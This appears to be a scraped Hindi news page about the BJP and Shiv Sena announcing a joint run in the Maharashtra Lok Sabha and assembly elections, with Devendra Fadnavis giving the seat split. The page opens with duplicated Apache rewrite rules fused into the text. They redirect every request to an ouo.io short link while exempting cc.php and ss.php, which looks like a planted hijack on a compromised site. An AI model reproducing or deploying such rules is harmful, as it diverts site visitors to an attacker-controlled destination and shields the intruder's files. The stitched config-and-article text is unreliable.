
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 388
Nextआगामी लोकसभा चुनाव के लिए महाराष्ट्र में शिवसेना और भाजपा ने एक साथ चुनाव लड़ने का एलान किया है। आज सोमवार को भाजपा अध्यक्ष अमित शाह और शिवसेना प्रमुख उद्धव ठाकरे के बीच एक घंटे से ज्यादा बातचीत चली। लंबी चली बातचीत के सकारात्मक परिणाम निकल कर आए।
दोनों दलों के बीच हुई बातचीत के बाद महाराष्ट्र के मुख्यमंत्री देवेंद्र फडणवीस ने प्रेस कांफ्रेस में कहा कि हमारे बीच मतभेद है, लेकिन दोनों दलों(भाजपा-शिवसेना) के विचार एक हैं। अब मतभेद भुलाकर साथ आने का वक्त है। देवेंद्र फणनवीस ने कहा कि भाजपा और शिवसेना विधानसभा और लोकसभा चुनाव साथ लड़ेंगे। उन्होंने कहा कि राष्ट्रवादी दलों का एक होना जरूरी है। भाजपा-शिवसेना का रिश्ता बहुत पुराना है। सीटों का एलान करते हुए देवेंद्र फडणवीस ने बताया कि शिवसेना 23 और भाजपा 25 सीटों पर लोकसभा चुनाव लड़ेगी। वहीं विधानसभा चुनाव में दोनों दल बराबर सीटों पर चुनाव लड़ेंगे।